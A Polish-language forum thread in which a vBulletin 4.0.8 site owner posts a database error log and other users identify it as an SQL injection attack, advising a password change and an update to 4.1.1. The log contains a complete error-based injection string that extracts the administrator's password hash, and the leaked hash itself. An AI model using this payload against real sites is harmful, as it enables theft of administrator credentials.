-
Błąd bazy danych
Od jakiś 2 dni wywala mi taki błąd :
Kod:
Database error in vBulletin 4.0.8:
Invalid SQL:
SELECT socialgroupcategory.title
FROM socialgroupcategory AS socialgroupcategory
WHERE socialgroupcategory.socialgroupcategoryid IN (-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*);
MySQL Error : Duplicate entry '34a177cdbb8e49c09a628916462da268:1' for key 1
Error Number : 1062
Request Date : Tuesday, November 22nd 2011 @ 09:00:45 AM
Error Date : Tuesday, November 22nd 2011 @ 09:00:45 AM
O w tym chodzi ?
-
coś masz z baza danych serwerem...
-
To jest fragment ataku SQL Injection.
Dokładnie tym zapytaniem atakujący zdobył: hasło administratora:
Kod:
(...) select password from user where userid=1 (...)
Zmień hasło jak najszybciej i zaktualizuj skrypt.
-
Dokładniej to "Duplicate entry '34a177cdbb8e49c09a628916462da268:1' for key 1" twój hash hasła (bez :1).
Jakbyś go porównał z tym co masz w bazie, a tym co się wyświetlił.
Zaktualizuj przynajmniej do 4.1.1 pl4.
-
Dzięki wielkie panowie , hasła już pozmieniane .
Można sprawdzić jakoś dokładnie kto dobierał mi się do bazy ? :/
-
Dochodzenie po adresie IP - innej opcji nie widzę.